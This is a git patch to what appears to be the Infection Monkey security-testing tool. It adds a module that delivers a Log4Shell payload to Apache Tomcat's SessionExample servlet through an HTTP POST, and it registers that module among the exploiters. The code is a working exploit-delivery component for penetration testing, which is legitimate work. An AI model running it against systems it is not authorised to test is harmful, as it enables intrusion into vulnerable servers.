From 79d92afcd43306f30628f905a81ec8223c007f12 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Jan 2022 13:56:17 +0100 Subject: [PATCH] Agent: Add Apache Tomcat support for Log4Shell exploit --- .../service_exploiters/__init__.py | 3 ++- .../service_exploiters/tomcat.py | 21 +++++++++++++++++++ 2 files changed, 23 insertions(+), 1 deletion(-) create mode 100644 monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py index 8122f2505..96823c894 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py @@ -3,7 +3,8 @@ from typing import List from .exploitable_service import IExploitableService from .poc_docker import DockerPOCExploit from .solr import SolrExploit +from .tomcat import TomcatExploit def get_log4shell_service_exploiters() -> List[IExploitableService]: - return [DockerPOCExploit(), SolrExploit()] + return [DockerPOCExploit(), SolrExploit(), TomcatExploit()] diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py new file mode 100644 index 000000000..bfabdd854 --- /dev/null +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py @@ -0,0 +1,21 @@ +from logging import getLogger + +import requests + +from infection_monkey.exploit.log4shell_utils.service_exploiters import IExploitableService +from infection_monkey.model import VictimHost + +logger = getLogger(__name__) + + +class TomcatExploit(IExploitableService): + service_name = "Apache Tomcat" + + @staticmethod + def trigger_exploit(payload: str, host: VictimHost, port: int): + url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample" + payload = {"dataname": "foo", "datavalue": payload} + try: + resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 + except requests.ReadTimeout as e: + logger.debug(f"Log4shell request failed {e}")